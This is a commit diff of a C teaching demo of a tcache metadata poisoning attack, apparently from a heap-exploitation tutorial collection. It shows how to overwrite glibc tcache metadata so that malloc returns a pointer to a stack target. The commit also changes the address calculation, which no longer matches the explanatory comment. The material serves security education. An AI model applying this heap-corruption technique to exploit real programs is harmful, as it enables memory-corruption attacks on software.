|
2 | 2 | #include <stdint.h> |
3 | 3 | #include <stdio.h> |
4 | 4 | #include <stdlib.h> |
| 5 | +#include <unistd.h> |
5 | 6 |
|
6 | 7 | // Tcache metadata poisoning attack |
7 | 8 | // ================================ |
@@ -35,23 +36,25 @@ int main() { |
35 | 36 | "metadata chunk."); |
36 | 37 | uint64_t *victim = malloc(0x10); |
37 | 38 | printf("Victim chunk is at: %p.\n\n", victim); |
| 39 | + puts("Now freeing it will lead to the allocation of the metadata on heap"); |
| 40 | + free(victim); |
38 | 41 |
|
39 | | - long metadata_size = sizeof(struct tcache_metadata); |
40 | | - long rounded_metadata_size = metadata_size & ~(HEADER_SIZE-1); // round it down |
41 | 42 | printf("Next we have to calculate the base address of the metadata struct.\n" |
42 | 43 | "The metadata struct itself is %#lx bytes in size. Additionally we\n" |
43 | 44 | "have to subtract the header of the victim chunk (so an extra 0x10\n" |
44 | 45 | "bytes).\n", |
45 | 46 | sizeof(struct tcache_metadata)); |
46 | 47 | struct tcache_metadata *metadata = |
47 | | - (struct tcache_metadata *)((long)victim - rounded_metadata_size - HEADER_SIZE); |
| 48 | + (struct tcache_metadata *)((long)victim + 2*HEADER_SIZE); |
48 | 49 | printf("The tcache metadata is located at %p.\n\n", metadata); |
49 | 50 |
|
50 | 51 | puts("Now we manipulate the metadata struct and insert the target address\n" |
51 | 52 | "in a chunk. Here we choose the second tcache bin.\n"); |
52 | 53 | metadata->counts[1] = 6; |
53 | 54 | metadata->entries[1] = &stack_target; |
54 | 55 |
|
| 56 | + char c; read(0, &c, 1); |
| 57 | + |
55 | 58 | uint64_t *evil = malloc(0x20); |
56 | 59 | printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n" |
57 | 60 | "second tcache bin. The returned pointer is %p.\n", |
|
0 commit comments